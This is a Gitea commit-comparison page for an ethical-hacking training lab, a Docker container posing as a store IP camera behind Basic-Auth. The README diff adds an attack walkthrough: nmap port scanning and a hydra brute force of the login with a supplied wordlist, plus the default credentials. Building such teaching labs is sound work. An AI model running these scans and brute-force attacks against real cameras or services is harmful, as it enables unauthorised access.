Actualiser README.md

Actualiser .gitea/workflows/master.yml
Actualiser .dockerignore
2026-04-20 13:43:00 +00:00 · 2026-04-20 07:50:01 +00:00 · 2026-04-20 07:49:39 +00:00 · 2026-04-20 07:48:54 +00:00 · 2026-04-19 21:41:07 +00:00 · 2026-04-19 21:40:51 +00:00
11 changed files with 5109 additions and 10 deletions
--- a/.dockerignore
+++ b/.dockerignore
@@ -1,3 +1,4 @@
 .gitignore
 docker-compose.yml
 LICENSE
+reports
--- a/.gitea/workflows/master.yml
+++ b/.gitea/workflows/master.yml
@@ -6,6 +6,9 @@ on:
      - ".gitignore"
      - "README.md"
      - "LICENSE"
+      - "docker-compose.yml"
+      - "video.mp4"
+      - "reports/"
    branches:
      - master

--- a/2
+++ b/2
@@ -1,9 +1,7 @@
 FROM nginx:alpine

-# Installation de FFmpeg
 RUN apk add --no-cache ffmpeg

-# Configuration
 COPY nginx.conf /etc/nginx/nginx.conf
 COPY htpasswd /etc/nginx/.htpasswd
 COPY index.html /usr/share/nginx/html/index.html
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@

 Fake cam is a simple docker container running a fake webcam. It is used for educational purposes to teach ethical hacking.

-> Default creds are : admin | cam123
+> Default creds are : admin | xxxxxx

 ## Requirements

@@ -22,8 +22,42 @@ git clone https://git.phorge.fr/l-nmch/fake-cam.git
 docker compose build
 ```

-3. Run the container
+## Deploy
+
+1. Run the container

 ```bash
 docker compose up -d
 ```
+
+2. Verify cam access
+
+```bash
+curl -u admin:cam123 http://<ip>:3301
+```
+
+## Attack
+
+1. Install required tools
+
+```bash
+apt install hydra curl nmap -y
+```
+
+2. Download the [wordlist](./wordlist.txt)
+
+```bash
+wget https://git.phorge.fr/l-nmch/fake-cam/raw/branch/master/wordlist.txt
+```
+
+3. Find open ports:
+
+```bash
+nmap -sC -sV <ip>
+```
+
+4. Bruteforce Basic-Auth
+
+```bash
+hydra -l admin -P wordlist.txt -s 3301 <ip> http-get /
+```
--- a/app/video.mp4
+++ b/app/video.mp4
--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -4,9 +4,9 @@ services:
    container_name: fake-webcam-stream
    restart: unless-stopped
    ports:
-      - "8080:80"
+      - "3301:80"
    volumes:
-      - ./video.mp4:/video.mp4:ro
+      - ./app:/app:ro
    deploy:
      resources:
        limits:
--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>IP CAMERA</title>
+    <title>Caméra IP Mayolis</title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
@@ -54,7 +54,7 @@
    <div class="cam-frame">
        <video id="stream" autoplay muted playsinline disablepictureinpicture disableRemotePlayback></video>
        <div class="osd">
-            <div class="osd-tl">CAM-01 | 512x512<br><span id="clock">00:00:00</span></div>
+            <div class="osd-tl">CAM-STORE-01 | 512x512<br><span id="clock">00:00:00</span></div>
            <div class="osd-tr"><span class="rec-dot"></span> REC</div>
            <div class="osd-bl">H.264 | 1500K | LIVE</div>
        </div>
--- a/reports/rendu-attaque.odt
+++ b/reports/rendu-attaque.odt
--- a/reports/rendu-remédiation.odt
+++ b/reports/rendu-remédiation.odt
--- a/stream.sh
+++ b/stream.sh
@@ -1,7 +1,7 @@
 #!/bin/sh
 echo "🎬 Démarrage du stream HLS optimisé (segments 2s)..."

-ffmpeg -re -stream_loop -1 -i /video.mp4 \
+ffmpeg -re -stream_loop -1 -i /app/video.mp4 \
  -c:v libx264 -preset veryfast -b:v 1500k -maxrate 1500k -bufsize 3000k \
  -c:a aac -b:a 128k -ar 44100 \
  -force_key_frames "expr:gte(t,n_forced*2)" \
--- a/wordlist.txt
+++ b/wordlist.txt
Author	SHA1	Message	Date
Léo Nonnenmacher	b0da2c76f5	Actualiser README.md	2026-04-20 13:43:00 +00:00
Léo Nonnenmacher	e7d69102b5	Actualiser .gitea/workflows/master.yml All checks were successful Docker Build and Push for Main Branch / docker (push) Successful in 12m9s Details	2026-04-20 07:50:01 +00:00
Léo Nonnenmacher	cca068d9d1	Actualiser .dockerignore Some checks failed Docker Build and Push for Main Branch / docker (push) Has been cancelled Details	2026-04-20 07:49:39 +00:00
Léo Nonnenmacher	fd2634ce29	Téléverser les fichiers vers "reports" Some checks failed Docker Build and Push for Main Branch / docker (push) Has been cancelled Details	2026-04-20 07:48:54 +00:00
Léo Nonnenmacher	3b681c8cf6	Actualiser docker-compose.yml	2026-04-19 21:41:07 +00:00
Léo Nonnenmacher	765edabd7a	Actualiser app/video.mp4 All checks were successful Docker Build and Push for Main Branch / docker (push) Successful in 12m25s Details	2026-04-19 21:40:51 +00:00
Léo Nonnenmacher	3a727762b2	Actualiser stream.sh Some checks failed Docker Build and Push for Main Branch / docker (push) Has been cancelled Details	2026-04-19 21:40:22 +00:00
Léo Nonnenmacher	fc910b5fdf	fix(docs): Updated docs	2026-04-15 18:05:49 +00:00
l-nmch	a3be4bf77a	chore(hack): Added custom wordlist All checks were successful Docker Build and Push for Main Branch / docker (push) Successful in 13m1s Details	2026-04-15 15:56:30 +02:00
l-nmch	29015050e8	fix(docs): Updated docs	2026-04-15 15:56:13 +02:00
l-nmch	cc3a8a0d8d	fix(docker): Modified port	2026-04-15 15:55:47 +02:00
l-nmch	00b6db6ca6	fix(html): Updated design	2026-04-15 15:53:31 +02:00
l-nmch	8ba844a81e	fix(docker): Upgraded build	2026-04-15 15:53:13 +02:00